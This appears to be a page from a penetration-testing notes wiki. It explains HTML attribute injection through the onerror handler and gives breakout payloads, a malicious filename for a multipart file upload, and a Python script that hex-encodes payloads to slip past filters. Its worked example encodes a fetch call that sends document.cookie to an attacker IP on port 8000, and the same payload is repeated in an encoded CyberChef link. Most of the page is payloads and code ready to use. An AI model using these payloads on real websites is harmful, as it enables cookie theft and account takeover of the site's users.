HTML Injection

The OnError Bypass Method

The onerror event handler is one of the most reliable HTML injection techniques because it triggers automatically when an HTML element fails to load a resource.

This makes it ideal for bypassing input filters that don't sanitize quotes

Basic Syntax Structure
x" onerror="PAYLOAD" x="

Breakdown

  1. x" - Closes the current HTML attribute value

  2. onerror="" - Injects the JavaScript event handler

  3. x=" - Opens a new attribute to maintain valid HTML syntax

File Upload Context

When a user uploads a file, the filename gets inserted into the src attribute. We can exploit this by using a malicious filename
<img src="<?php echo $cat['photo_path']; ?>" alt="x" onerror="" x="" class="cat-photo">

Trigger the Error

Content-Disposition: form-data; name="cat_photo"; filename="x\"onerror=\"[encoded_payload]\" x=\".png"
Content-Type: image/png

GIF89a;
test

Context-Aware Payload Construction

For HTML attribute injection:
filename" onerror="alert(document.domain)" x="
For content injection:
<img src=x onerror="alert(1)">
When dealing with filename injection:
malicious" onerror="payload" x=".txt
For text inputs rendered in HTML:
test" onmouseover="alert(document.cookie)" x="

Common characters that may be filtered

  • Parentheses () - Required for JavaScript function calls

  • Semicolons ; - Used to terminate JavaScript statements

  • Quotes ' - May be filtered while " is not

  • Angle brackets <> - HTML tag delimiters

Bypass Using HTML Hex Encoding

Python encoding script

#!/usr/bin/python3
import sys

if len(sys.argv) != 2:
    print(f'[!] Usage: {sys.argv[0]} <payload>')
    sys.exit(1)

string = sys.argv[1]

def Encoding(string):
    output = ''
    for character in string:
        output += '&#x' + hex(ord(character))[2:]
    return output

if __name__ == '__main__':
    hexHtmlEncoding = Encoding(string)
    print(hexHtmlEncoding)
Example
python3 encode.py "fetch('http://10.10.14.91:8000/?cookie=' + document.cookie);"

Cyber-Chef Recipe example

https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity(true,'Hex%20entities')Find_/_Replace(%7B'option':'Regex','string':';'%7D,'',true,false,true,false)&input=ZmV0Y2goJ2h0dHA6Ly8xMC4xMC4xNC45MTo4MDAwLz9jb29raWU9JyArIGRvY3VtZW50LmNvb2tpZSk7&ieol=CRLF&oeol=FF

PreviousVulnerabilitiesNextArbitrary File Read

Last updated